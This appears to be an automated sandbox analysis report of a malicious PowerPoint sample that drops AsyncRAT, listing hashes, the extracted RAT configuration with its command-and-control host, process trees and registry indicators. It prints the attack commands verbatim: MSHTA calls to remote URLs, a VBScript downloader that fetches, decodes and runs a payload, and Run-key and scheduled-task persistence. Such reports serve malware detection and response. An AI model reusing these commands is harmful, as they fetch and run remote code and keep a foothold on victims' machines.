Analysis
- max time kernel: 94s
- max time network: 139s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 05-03-2021 10:01
Static task: static1
Behavioral task: behavioral1
- Sample: sample.ppt
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: sample.ppt
- Resource: win10v20201028
General
- Target: sample.ppt
- Size: 224KB
- MD5: f93b770274956fb4b09e4962a45c32da
- SHA1: 8e295f26e68ea595aaee521db9d29d39425ffbb1
- SHA256: 56dd6d0c5eacf5a7ec7233c4acb4cf97df95f66ed5d4d4880dca62f6b4b27a69
- SHA512: 98856b284df590ec1bf8e4edeab529315a3115a9f7d1a277328fa6ad4fcf25fa120b814a5714148df05386ff4d738523b3bec1617745631a766efab5cf95ced0
Malware Config
Extracted
asyncrat
0.5.7B
micomico.ddns.net:4000
AsyncMutex_6SI8OkPnk
- aes_key: xHd6d9DzQMkRsJZC7bi0eTRsEMK6w0Yc
- anti_detection: false
- autorun: false
- bdos: false
- delay: 2021comecou@$gringoooooobrabao
- host: micomico.ddns.net
- hwid: 3
- install_file:
- install_folder: %AppData%
- mutex: AsyncMutex_6SI8OkPnk
- pastebin_config: null
- port: 4000
- version: 0.5.7B
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
MSHTA.exe, ping.exe, ping.exe

| description | pid | pid_target | process | target process |
| --- | --- | --- | --- | --- |
| Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 2272 | 740 | MSHTA.exe | POWERPNT.EXE |
| Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 2164 | 740 | ping.exe | POWERPNT.EXE |
| Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 4100 | 740 | ping.exe | POWERPNT.EXE |

-
Async RAT payload 2 IoCs
Processes:

| resource | yara_rule |
| --- | --- |
| behavioral2/memory/4760-85-0x0000000000400000-0x0000000000412000-memory.dmp | asyncrat |
| behavioral2/memory/4760-86-0x000000000040D0AE-mapping.dmp | asyncrat |

-
Blocklisted process makes network request 15 IoCs
Processes:
MSHTA.exe, WScript.exe, Powershell.exe

| flow | pid | process |
| --- | --- | --- |
| 32 | 2272 | MSHTA.exe |
| 34 | 2272 | MSHTA.exe |
| 36 | 2272 | MSHTA.exe |
| 38 | 2272 | MSHTA.exe |
| 40 | 2272 | MSHTA.exe |
| 48 | 2272 | MSHTA.exe |
| 49 | 2272 | MSHTA.exe |
| 50 | 2272 | MSHTA.exe |
| 53 | 2272 | MSHTA.exe |
| 54 | 2272 | MSHTA.exe |
| 56 | 2272 | MSHTA.exe |
| 57 | 2272 | MSHTA.exe |
| 59 | 1988 | WScript.exe |
| 61 | 1988 | WScript.exe |
| 68 | 1348 | Powershell.exe |

-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
MSHTA.exe
- description: Set value (str)
  ioc: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).btfee)|IEX\"\", 0 : window.close\")"
  process: MSHTA.exe
- description: Key created
  ioc: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run
  process: MSHTA.exe
- description: Set value (str)
  ioc: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).cutona)|IEX\"\", 0 : window.close\")"
  process: MSHTA.exe
- description: Set value (str)
  ioc: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@bublicamukajuka.blogspot.com/p/42.html\"\", 0 : window.close\")"
  process: MSHTA.exe
- description: Set value (str)
  ioc: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@titupatiyannala-myrynaal.blogspot.com/p/42.html\"\", 0 : window.close\")"
  process: MSHTA.exe
- description: Set value (str)
  ioc: \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@papagunnakjllidmc.blogspot.com/p/42.html\"\", 0 : window.close\")"
  process: MSHTA.exe

-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exe

| pid | pid_target | process | target process |
| --- | --- | --- | --- |
| 4196 | 2272 | WerFault.exe | MSHTA.exe |

-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
winword.exe, POWERPNT.EXE

| description | ioc | process |
| --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | winword.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | winword.exe |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | POWERPNT.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | POWERPNT.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | POWERPNT.EXE |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | winword.exe |

-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
winword.exe, POWERPNT.EXE

| description | ioc | process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | winword.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | winword.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | winword.exe |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | POWERPNT.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | POWERPNT.EXE |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | POWERPNT.EXE |

-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exe, taskkill.exe

| pid | process |
| --- | --- |
| 3212 | taskkill.exe |
| 3524 | taskkill.exe |

-
Modifies registry class 1 IoCs
Processes:
cmd.exe

| description | ioc | process |
| --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings | cmd.exe |

-
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
POWERPNT.EXE, winword.exe

| pid | process |
| --- | --- |
| 740 | POWERPNT.EXE |
| 3208 | winword.exe |

-
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
WerFault.exe, Powershell.exe, Powershell.exe

| pid | process |
| --- | --- |
| 4196 | WerFault.exe |
| 4196 | WerFault.exe |
| 4196 | WerFault.exe |
| 4196 | WerFault.exe |
| 4196 | WerFault.exe |
| 4196 | WerFault.exe |
| 4196 | WerFault.exe |
| 4196 | WerFault.exe |
| 4196 | WerFault.exe |
| 4196 | WerFault.exe |
| 4196 | WerFault.exe |
| 4196 | WerFault.exe |
| 4196 | WerFault.exe |
| 4196 | WerFault.exe |
| 4196 | WerFault.exe |
| 4196 | WerFault.exe |
| 2416 | Powershell.exe |
| 1348 | Powershell.exe |
| 2416 | Powershell.exe |
| 1348 | Powershell.exe |
| 2416 | Powershell.exe |
| 1348 | Powershell.exe |

-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exe, taskkill.exe, WerFault.exe, Powershell.exe, Powershell.exe

| description | pid | process |
| --- | --- | --- |
| Token: SeDebugPrivilege | 3212 | taskkill.exe |
| Token: SeDebugPrivilege | 3524 | taskkill.exe |
| Token: SeDebugPrivilege | 4196 | WerFault.exe |
| Token: SeDebugPrivilege | 1348 | Powershell.exe |
| Token: SeDebugPrivilege | 2416 | Powershell.exe |
| Token: SeIncreaseQuotaPrivilege | 2416 | Powershell.exe |
| Token: SeSecurityPrivilege | 2416 | Powershell.exe |
| Token: SeTakeOwnershipPrivilege | 2416 | Powershell.exe |
| Token: SeLoadDriverPrivilege | 2416 | Powershell.exe |
| Token: SeSystemProfilePrivilege | 2416 | Powershell.exe |
| Token: SeSystemtimePrivilege | 2416 | Powershell.exe |
| Token: SeProfSingleProcessPrivilege | 2416 | Powershell.exe |
| Token: SeIncBasePriorityPrivilege | 2416 | Powershell.exe |
| Token: SeCreatePagefilePrivilege | 2416 | Powershell.exe |
| Token: SeBackupPrivilege | 2416 | Powershell.exe |
| Token: SeRestorePrivilege | 2416 | Powershell.exe |
| Token: SeShutdownPrivilege | 2416 | Powershell.exe |
| Token: SeDebugPrivilege | 2416 | Powershell.exe |
| Token: SeSystemEnvironmentPrivilege | 2416 | Powershell.exe |
| Token: SeRemoteShutdownPrivilege | 2416 | Powershell.exe |
| Token: SeUndockPrivilege | 2416 | Powershell.exe |
| Token: SeManageVolumePrivilege | 2416 | Powershell.exe |
| Token: 33 | 2416 | Powershell.exe |
| Token: 34 | 2416 | Powershell.exe |
| Token: 35 | 2416 | Powershell.exe |
| Token: 36 | 2416 | Powershell.exe |
| Token: SeIncreaseQuotaPrivilege | 1348 | Powershell.exe |
| Token: SeSecurityPrivilege | 1348 | Powershell.exe |
| Token: SeTakeOwnershipPrivilege | 1348 | Powershell.exe |
| Token: SeLoadDriverPrivilege | 1348 | Powershell.exe |
| Token: SeSystemProfilePrivilege | 1348 | Powershell.exe |
| Token: SeSystemtimePrivilege | 1348 | Powershell.exe |
| Token: SeProfSingleProcessPrivilege | 1348 | Powershell.exe |
| Token: SeIncBasePriorityPrivilege | 1348 | Powershell.exe |
| Token: SeCreatePagefilePrivilege | 1348 | Powershell.exe |
| Token: SeBackupPrivilege | 1348 | Powershell.exe |
| Token: SeRestorePrivilege | 1348 | Powershell.exe |
| Token: SeShutdownPrivilege | 1348 | Powershell.exe |
| Token: SeDebugPrivilege | 1348 | Powershell.exe |
| Token: SeSystemEnvironmentPrivilege | 1348 | Powershell.exe |
| Token: SeRemoteShutdownPrivilege | 1348 | Powershell.exe |
| Token: SeUndockPrivilege | 1348 | Powershell.exe |
| Token: SeManageVolumePrivilege | 1348 | Powershell.exe |
| Token: 33 | 1348 | Powershell.exe |
| Token: 34 | 1348 | Powershell.exe |
| Token: 35 | 1348 | Powershell.exe |
| Token: 36 | 1348 | Powershell.exe |
| Token: SeIncreaseQuotaPrivilege | 2416 | Powershell.exe |
| Token: SeSecurityPrivilege | 2416 | Powershell.exe |
| Token: SeTakeOwnershipPrivilege | 2416 | Powershell.exe |
| Token: SeLoadDriverPrivilege | 2416 | Powershell.exe |
| Token: SeSystemProfilePrivilege | 2416 | Powershell.exe |
| Token: SeSystemtimePrivilege | 2416 | Powershell.exe |
| Token: SeProfSingleProcessPrivilege | 2416 | Powershell.exe |
| Token: SeIncBasePriorityPrivilege | 2416 | Powershell.exe |
| Token: SeCreatePagefilePrivilege | 2416 | Powershell.exe |
| Token: SeBackupPrivilege | 2416 | Powershell.exe |
| Token: SeRestorePrivilege | 2416 | Powershell.exe |
| Token: SeShutdownPrivilege | 2416 | Powershell.exe |
| Token: SeDebugPrivilege | 2416 | Powershell.exe |
| Token: SeSystemEnvironmentPrivilege | 2416 | Powershell.exe |
| Token: SeRemoteShutdownPrivilege | 2416 | Powershell.exe |
| Token: SeUndockPrivilege | 2416 | Powershell.exe |
| Token: SeManageVolumePrivilege | 2416 | Powershell.exe |

-
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
POWERPNT.EXE, winword.exe

| pid | process |
| --- | --- |
| 740 | POWERPNT.EXE |
| 740 | POWERPNT.EXE |
| 740 | POWERPNT.EXE |
| 3208 | winword.exe |
| 3208 | winword.exe |
| 3208 | winword.exe |

-
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
POWERPNT.EXE, MSHTA.exe, cmd.exe

| description | pid | process | target process |
| --- | --- | --- | --- |
| PID 740 wrote to memory of 2272 | 740 | POWERPNT.EXE | MSHTA.exe |
| PID 740 wrote to memory of 2272 | 740 | POWERPNT.EXE | MSHTA.exe |
| PID 740 wrote to memory of 2164 | 740 | POWERPNT.EXE | ping.exe |
| PID 740 wrote to memory of 2164 | 740 | POWERPNT.EXE | ping.exe |
| PID 740 wrote to memory of 3208 | 740 | POWERPNT.EXE | winword.exe |
| PID 740 wrote to memory of 3208 | 740 | POWERPNT.EXE | winword.exe |
| PID 2272 wrote to memory of 3172 | 2272 | MSHTA.exe | cmd.exe |
| PID 2272 wrote to memory of 3172 | 2272 | MSHTA.exe | cmd.exe |
| PID 2272 wrote to memory of 768 | 2272 | MSHTA.exe | schtasks.exe |
| PID 2272 wrote to memory of 768 | 2272 | MSHTA.exe | schtasks.exe |
| PID 2272 wrote to memory of 1348 | 2272 | MSHTA.exe | Powershell.exe |
| PID 2272 wrote to memory of 1348 | 2272 | MSHTA.exe | Powershell.exe |
| PID 2272 wrote to memory of 1348 | 2272 | MSHTA.exe | Powershell.exe |
| PID 3172 wrote to memory of 1988 | 3172 | cmd.exe | WScript.exe |
| PID 3172 wrote to memory of 1988 | 3172 | cmd.exe | WScript.exe |
| PID 2272 wrote to memory of 2416 | 2272 | MSHTA.exe | Powershell.exe |
| PID 2272 wrote to memory of 2416 | 2272 | MSHTA.exe | Powershell.exe |
| PID 2272 wrote to memory of 2416 | 2272 | MSHTA.exe | Powershell.exe |
| PID 2272 wrote to memory of 3524 | 2272 | MSHTA.exe | taskkill.exe |
| PID 2272 wrote to memory of 3524 | 2272 | MSHTA.exe | taskkill.exe |
| PID 2272 wrote to memory of 3212 | 2272 | MSHTA.exe | taskkill.exe |
| PID 2272 wrote to memory of 3212 | 2272 | MSHTA.exe | taskkill.exe |
| PID 740 wrote to memory of 4100 | 740 | POWERPNT.EXE | ping.exe |
| PID 740 wrote to memory of 4100 | 740 | POWERPNT.EXE | ping.exe |

Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
Command line: "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\sample.ppt" /ou ""
Tree depth: 1
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\MSHTA.exe
Command line: MSHTA http://12384928198391823%12384928198391823@j.mp/dokdwkkwkdwkxxxdcjcdkwk
Tree depth: 2
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\FIX.VBS", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
Tree depth: 3
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Public\SiggiaW.vbs"
Tree depth: 4
- Blocklisted process makes network request
-
C:\Windows\System32\schtasks.exe
Command line: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@mylundisfarbigthenyouthink.blogspot.com/p/42.html""\"", 0 : window.close"\")
Tree depth: 3
- Creates scheduled task(s)
-
C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
Command line: "C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX
Tree depth: 3
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
Tree depth: 4
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
Command line: dw20.exe -x -s 692
Tree depth: 5
-
C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
Command line: "C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).btfee)|IEX
Tree depth: 3
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe
Command line: "C:\Windows\System32\taskkill.exe" /f /im winword.exe
Tree depth: 3
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe
Command line: "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
Tree depth: 3
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exe
Command line: C:\Windows\system32\WerFault.exe -u -p 2272 -s 2816
Tree depth: 3
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\ping.exe
Command line: ping
Tree depth: 2
- Process spawned unexpected child process
- Runs ping.exe
-
C:\Program Files\Microsoft Office\Root\Office16\winword.exe
Command line: winword
Tree depth: 2
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\ping.exe
Command line: ping 127.0.0.1
Tree depth: 2
- Process spawned unexpected child process
- Runs ping.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  MD5: 7b619bb67bea8c3e777e6255af672811
  SHA1: 73a0ddab06af144e4b1ce7aa1857c06dec5d8740
  SHA256: 0f7aebca0b8db44ed97560dd716cf88d0d6e3bf7c4561f98354960acd1e1b404
  SHA512: 35e7190ffe8f81042e8588052990ecd28470a438196c3c5e813737af35a7e2a349e82a403680864ebca7527bc5643d95335a3cb612a8c81ad6158d00e0c3293b
- C:\Users\Public\SiggiaW.vbs
  MD5: 49744d1b597f85a2691eeeccab3f5ec9
  SHA1: 53be659955bdf552d103ddd2251f97920c4830bd
  SHA256: 09af8affea2e91779fc5bd8e45c8eb4274f6cb0fe78cb96c77586f988958fb6f
  SHA512: 7d6036c802670bca691b26e3f22badfce85641354d67d460d38ff26edef248bcc6a51bf81406b11f2b6972525f8af6dfdcc26f298438280d001b03292f767e3f